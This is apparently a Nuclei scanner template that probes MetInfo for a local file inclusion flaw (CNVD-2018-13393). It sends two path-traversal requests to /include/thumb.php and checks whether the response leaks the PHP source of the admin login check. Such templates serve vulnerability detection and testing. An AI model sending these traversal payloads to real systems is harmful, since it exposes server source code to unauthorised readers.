id: poc-yaml-metinfo-lfi-cnvd-2018-13393

info:
  name: poc-yaml-metinfo-lfi-cnvd-2018-13393
  author: JingLing(https://hackfun.org/)
  severity: medium
  tags: xray-converted,lfi,cnvd-2018-13393,ct-158191
  reference:
    - https://paper.seebug.org/676/

http:
  - raw:
      - |
        GET /include/thumb.php?dir=http/.....///.....///admin/login/login_check.php HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "<?php"
          - "login_met_cookie($metinfo_admin_name);"
  - raw:
      - |
        GET /include/thumb.php?dir=http\..\admin\login\login_check.php HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "<?php"
          - "login_met_cookie($metinfo_admin_name);"